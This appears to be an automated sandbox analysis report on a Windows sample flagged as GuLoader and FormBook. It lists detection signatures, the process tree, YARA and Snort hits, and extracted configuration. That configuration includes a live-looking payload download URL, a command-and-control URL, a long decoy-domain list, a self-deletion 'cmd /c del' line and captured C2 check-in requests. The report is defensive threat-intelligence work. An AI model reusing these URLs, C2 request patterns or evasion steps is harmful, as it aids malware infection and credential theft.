Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3sO4kwopMH.exe

Overview

General Information

Sample Name:3sO4kwopMH.exe
Analysis ID:1667
MD5:ab5135e71815ad27daf57be78754c85d
SHA1:805c799582b9850f835d42c09ca1aeee35b2faf7
SHA256:4df45d5c109f75ab624bef07b6d0ecc5f7c7fd2527efdd2af3b18e0c5d8b32ee
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to several IPs in different countries
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • 3sO4kwopMH.exe (PID: 7912 cmdline: 'C:\Users\user\Desktop\3sO4kwopMH.exe' MD5: AB5135E71815AD27DAF57BE78754C85D)
    • 3sO4kwopMH.exe (PID: 2028 cmdline: 'C:\Users\user\Desktop\3sO4kwopMH.exe' MD5: AB5135E71815AD27DAF57BE78754C85D)
      • explorer.exe (PID: 4868 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • help.exe (PID: 1028 cmdline: C:\Windows\SysWOW64\help.exe MD5: DD40774E56D4C44B81F2DFA059285E75)
          • cmd.exe (PID: 9060 cmdline: /c del 'C:\Users\user\Desktop\3sO4kwopMH.exe' MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://45.137.22.91/bin_txbkK174.bin"}

Threatname: FormBook

{"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001F.00000002.5659773330.0000000003167000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x13078:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    0000001F.00000002.5641903832.0000000002600000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 21 entries

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}
      Source: 00000000.00000002.785872843.0000000002280000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://45.137.22.91/bin_txbkK174.bin"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: 3sO4kwopMH.exeVirustotal: Detection: 43%Perma Link
      Source: 3sO4kwopMH.exeMetadefender: Detection: 25%Perma Link
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.5641903832.0000000002600000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000000.1094543627.000000000EDCF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.1228957686.000000001E350000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.5640420327.00000000023B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000000.1156599847.000000000EDCF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.5629824643.0000000000120000.00000040.00020000.sdmp, type: MEMORY
      Antivirus detection for URL or domainShow sources
      Source: http://www.metalworkingadditives.online/b2c0/?6l=tQ9OUq/au2j7Ts3tmWTzZlmpGIW84sc0d5YJpv42KDMZxUSBkatd7Ys79Ddqwtu/lQ5M&FZ=o87TchT09DMdG270Avira URL Cloud: Label: phishing
      Source: http://www.metalworkingadditives.online/b2c0/Avira URL Cloud: Label: phishing
      Multi AV Scanner detection for domain / URLShow sources
      Source: www.thesewhitevvalls.comVirustotal: Detection: 6%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Forflyt4\BACC.exeMetadefender: Detection: 25%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\Ggddhhz98\vga4hmhzls.exeMetadefender: Detection: 25%Perma Link
      Source: 31.2.help.exe.316796c.4.unpackAvira: Label: TR/Dropper.Gen
      Source: 31.2.help.exe.27c03d0.1.unpackAvira: Label: TR/Dropper.Gen
      Source: 3sO4kwopMH.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: Binary string: wntdll.pdbUGP source: 3sO4kwopMH.exe, 00000017.00000002.1231484601.000000001E7DD000.00000040.00000001.sdmp, help.exe, 0000001F.00000002.5650535710.0000000002C10000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: 3sO4kwopMH.exe, help.exe
      Source: Binary string: help.pdbGCTL source: 3sO4kwopMH.exe, 00000017.00000002.1219247675.00000000000D0000.00000040.00020000.sdmp
      Source: Binary string: help.pdb source: 3sO4kwopMH.exe, 00000017.00000002.1219247675.00000000000D0000.00000040.00020000.sdmp
      Source: C:\Windows\SysWOW64\help.exeCode function: 31_2_0012FAA0 FindFirstFileW,FindNextFileW,FindClose,31_2_0012FAA0
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_004022D0
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_004022D0
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_0040324D
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_0040324D
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_00403671
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_00403472
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_00403472
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_004032D9
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_004032D9
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_004022E8
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_004022E8
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_004034F2
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_004034F2
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_004036F6
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_00403369
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_00403369
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_0040377B
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_004031C2
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_004031C2
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 4x nop then mov edx, edx0_2_004033F2
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_004033F2
      Source: C:\Users\user\Desktop\3sO4kwopMH.exeCode function: 5x nop then push edx0_2_004035F4

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49759 -> 45.137.22.91:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49775 -> 141.136.33.194:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49775 -> 141.136.33.194:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49775 -> 141.136.33.194:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49777 -> 198.185.159.144:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49777 -> 198.185.159.144:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49777 -> 198.185.159.144:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49783 -> 208.91.197.27:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49783 -> 208.91.197.27:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49783 -> 208.91.197.27:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 198.185.159.144:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 198.185.159.144:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 198.185.159.144:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49810 -> 45.137.22.91:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49814 -> 45.137.22.91:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49819 -> 45.137.22.91:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49831 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49831 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49831 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 119.8.56.140:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 119.8.56.140:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 119.8.56.140:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 209.17.116.163:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49878 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49878 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49878 -> 104.21.71.3:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49881 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49881 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49881 -> 66.29.130.249:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 172.67.186.156:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 172.67.186.156:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 172.67.186.156:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 207.97.200.47:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 207.97.200.47:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 207.97.200.47:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49890 -> 185.33.94.234:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49890 -> 185.33.94.234:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49890 -> 185.33.94.234:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 172.105.103.207:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49899 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49899 -> 91.195.240.94:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49899 -> 91.195.240.94:80
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 52.206.159.80 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 173.236.155.205 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.33.94.234 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 119.8.56.140 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.92.26.10 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.130.249 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.105.103.207 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 82.98.134.154 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 207.97.200.47 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.71.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.55.180.127 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 107.163.179.182 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.64.113.210 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 134.122.133.171 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.186.156 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.18.26.58 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 141.136.33.194 80Jump to behavior
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: http://45.137.22.91/bin_txbkK174.bin
      Source: Malware configuration extractorURLs: www.thesewhitevvalls.com/b2c0/
      Source: Joe Sandbox ViewASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=pNOMSNpa2nFodbx7OAo46uS2HRQWEq7utyFZRVq2jKkVgIB4ODesmsJbXhVN8N4mMldk&FZ=o87TchT09DMdG270 HTTP/1.1Host: www.cottonhome.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=rxQGpNn/7tqmtyCuW//WbC4wyhDm+g4ynHD5Avps/ncon/KAjYuSbfQpBFNQzeCjDp7B HTTP/1.1Host: www.lnagvv.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=VCgpyXlBsP1lbRymbBPI4nWEh9OaL9x1M7Q8z7FH8RRKtgtUdWTKZvz8f0ArKSOzz/nk&FZ=o87TchT09DMdG270 HTTP/1.1Host: www.collabkc.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=BOLRII6D38ck4OH5BKipnA9EB2xOpDp4Q3Jcl/RK3evYC4cCjzOH+BACfNcEJ7Jce5u5 HTTP/1.1Host: www.pearl-interior.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&FZ=o87TchT09DMdG270 HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=nxasyuViNoySCxDLhjKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/Eop7G9jYjLp HTTP/1.1Host: www.unasolucioendesa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
